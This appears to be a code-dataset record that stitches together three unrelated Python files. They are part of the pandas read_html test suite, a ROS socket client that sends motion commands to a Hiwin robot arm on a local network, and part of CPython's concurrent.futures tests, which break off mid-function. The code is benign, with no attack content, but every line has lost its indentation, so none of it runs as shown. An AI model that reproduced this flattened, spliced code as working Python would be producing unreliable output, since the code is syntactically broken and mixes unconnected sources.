df = self.read_html(self.banklist_data, "Gold Canyon", attrs={"id": "table"})[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
result = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
"""
)[0]
expected = DataFrame([["a", "b", "c"]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html(
"""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "Z", "C"]], columns=["X", "X.1", "Y", "Z", "W"]
)
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html(
"""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "B", "D"]], columns=["A", "B", "B.1", "B.2", "C"]
)
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html(
"""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["C", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["A", "B"], ["A", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({"date": date_range("1/1/2001", periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=["date"], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range("1/1/2001", periods=10))
df = DataFrame(
{
"date": raw_dates.map(lambda x: str(x.date())),
"time": raw_dates.map(lambda x: str(x.time())),
}
)
res = self.read_html(
df.to_html(), parse_dates={"datetime": [1, 2]}, index_col=1
)
newdf = DataFrame({"datetime": raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_computer_sales_page(self, datapath):
data = datapath("io", "data", "html", "computer_sales_page.html")
msg = (
r"Passed header=\[0,1\] are too many "
r"rows for this multi_index of columns"
)
with pytest.raises(ParserError, match=msg):
self.read_html(data, header=[0, 1])
data = datapath("io", "data", "html", "computer_sales_page.html")
assert self.read_html(data, header=[1, 2])
def test_wikipedia_states_table(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
assert os.path.isfile(data), f"{repr(data)} is not a file"
assert os.path.getsize(data), f"{repr(data)} is an empty file"
result = self.read_html(data, "Arizona", header=1)[0]
assert result["sq mi"].dtype == np.dtype("float64")
def test_parser_error_on_empty_header_row(self):
msg = (
r"Passed header=\[0,1\] are too many "
r"rows for this multi_index of columns"
)
with pytest.raises(ParserError, match=msg):
self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""",
header=[0, 1],
)
def test_decimal_rows(self):
# GH 12907
result = self.read_html(
"""<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>""",
decimal="#",
)[0]
expected = DataFrame(data={"Header": 1100.101}, index=[0])
assert result["Header"].dtype == np.dtype("float64")
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
for arg in [True, False]:
with pytest.raises(TypeError):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={"a": str},
)[0]
expected = DataFrame({"a": ["0.763", "0.244"]})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244],
)[0]
expected = DataFrame({"a": [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({"a": ["N/A", "NA"]})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({"a": [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
"""
)[0]
expected = DataFrame(data=[["a", "b"], [np.nan, np.nan]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(
data=[("Hillary", 68, "D"), ("Bernie", 74, "D"), ("Donald", 69, "R")]
)
expected_df.columns = [
["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1", "Unnamed: 2_level_1"],
]
html = expected_df.to_html(index=False)
html_df = self.read_html(html)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath("io", "data", "html", "banklist.html")
self.read_html(banklist_data, ".*Water.*", flavor=["lxml", "html5lib"])
def test_to_html_timestamp(self):
rng = date_range("2000-01-01", periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert "2000-01-01" in result
@pytest.mark.parametrize(
"displayed_only,exp0,exp1",
[
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"])),
],
)
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO(
"""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>"""
)
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
def test_encode(self, html_encoding_file):
base_path = os.path.basename(html_encoding_file)
root = os.path.splitext(base_path)[0]
_, encoding = root.split("_")
try:
with open(html_encoding_file, "rb") as fobj:
from_string = self.read_html(
fobj.read(), encoding=encoding, index_col=0
).pop()
with open(html_encoding_file, "rb") as fobj:
from_file_like = self.read_html(
BytesIO(fobj.read()), encoding=encoding, index_col=0
).pop()
from_filename = self.read_html(
html_encoding_file, encoding=encoding, index_col=0
).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# utf-16/32 seem to fail on Windows
if is_platform_windows():
if "16" in encoding or "32" in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get("flavor") == "lxml":
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO(
"""
<table><tr><td>spam<foobr />eggs</td></tr></table>"""
)
assert self.read_html(bad)
with pytest.raises(ValueError, match="passed a non-rewindable file object"):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile:
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = "" if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
good = MockFile("<table><tr><td>spam<br />eggs</td></tr></table>")
bad = MockFile("<table><tr><td>spam<foobr />eggs</td></tr></table>")
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super().run()
except Exception as err:
self.err = err
else:
self.err = None
# force import check by reinitialising global vars in html.py
reload(pandas.io.html)
filename = datapath("io", "data", "html", "valid_markup.html")
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
|
Hiwin_RT605_ArmCommand_Socket_20190627164529.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
pos_feedback_times = 0
mode_feedback_times = 0
msg_feedback = 1
# Receive commands from the strategy side and send them to the controller PC over a socket
import socket
## multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
Socket = 0
data = '0' # initial value of the transmitted data
Arm_feedback = 1 # assume the arm is busy
NAME = 'socket_server'
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
return  # a plain return ends the generator (raising StopIteration here fails under PEP 479, Python 3.7+)
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
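# Usage sketch of the switch idiom above (it mirrors how Socket_command() uses it
# below): each case() call returns True when the value matches, and an
# argument-less case() acts as the default branch.
#
#   for case in switch(command):
#       if case(1):
#           ...  # runs when command == 1
#           break
#       if case():  # default branch
#           ...
#           break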
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self, ArmState, SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(False,False)
def point_data(x,y,z,pitch,roll,yaw): ## receive pose data sent from the strategy side
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## receive arm mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## receive arm speed mode data sent from the strategy side
global speed_mode_flag
socket_cmd.Speedmode = speedmode
# def Grip_Mode(req): ## receive gripper action data sent from the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_talker(): ## create the server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
# rospy.loginfo(state)
pub.publish(state)
rate.sleep()
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
#rospy.spin() ## spin one
##------------ server side: end -------
##---------- socket packet transmission --------------##
##--------------- send arm commands over the socket -----------------
def Socket_command():
global arm_mode_flag,speed_mode_flag,point_data_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#------- set arm rapid/safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action = 5 ## switch back to the initial mode state
Socket.send(data.encode('utf-8')) # send the command string over the socket as UTF-8
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
# the arm side reports the arm state
if str(feedback_str[2]) == '48':# F: the arm is Ready and can accept the next motion command
state_feedback.ArmState = 0
# Arm_feedback = 0
# socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '49':# T: the arm is busy and cannot execute the next motion command
state_feedback.ArmState = 1
# Arm_feedback = 1
# socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6: the strategy has finished
state_feedback.ArmState = 6
# Arm_feedback = 6
# socket_client_arm_state(Arm_feedback)
print("shutdown")
# check the sent flag
if str(feedback_str[4]) == '48':# returns 0 (false)
state_feedback.SentFlag = 0
# Socket_sent_flag = False
# socket_client_sent_flag(Socket_sent_flag)
if str(feedback_str[4]) == '49':# returns 1 (true)
state_feedback.SentFlag = 1
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##--------------- send arm commands over the socket: end -----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown: # exit once the strategy reports completion (the old Arm_feedback global is never updated)
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##------------- socket packet transmission: end --------------##
## multithreading
def thread_test():
socket_client()
## multithreading: end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5 ## switch to the initial mode state
t = threading.Thread(target=thread_test)
t.start() # start the worker thread
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
|
test_concurrent_futures.py
|
import test.support
# Skip tests if _multiprocessing wasn't built.
test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
test.support.import_module('threading')
from test.script_helper import assert_python_ok
import os
import sys
import threading
import time
import unittest
import weakref
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future)
from concurrent.futures.process import BrokenProcessPool
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
def mul(x, y):
return x * y
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
class MyObject(object):
def my_method(self):
pass
class ExecutorMixin:
worker_count = 5
def setUp(self):
self.t1 = time.time()
try:
self.executor = self.executor_type(max_workers=self.worker_count)
except NotImplementedError as e:
self.skipTest(str(e))
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
dt = time.time() - self.t1
if test.support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 60, "synchronization issue: test lasted too long")
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
t = {executor_type}(5)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, unittest.TestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._threads), 3)
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
class ProcessPoolShutdownTest(ProcessPoolMixin, ExecutorShutdownTest, unittest.TestCase):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
del executor
queue_management_thread.join()
for p in processes.values():
p.join()
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, unittest.TestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setswitchinterval(oldswitchinterval)
class ProcessPoolWaitTests(ProcessPoolMixin, WaitTests, unittest.TestCase):
pass
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
future1 = self.executor.submit(time.sleep, 2)
completed = [f for f in futures.as_completed([future1,future1])]
self.assertEqual(len(completed), 1)
class ThreadPoolAsCompletedTests(ThreadPoolMixin, AsCompletedTests, unittest.TestCase):
pass
class ProcessPoolAsCompletedTests(ProcessPoolMixin, AsCompletedTests, unittest.TestCase):
pass
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
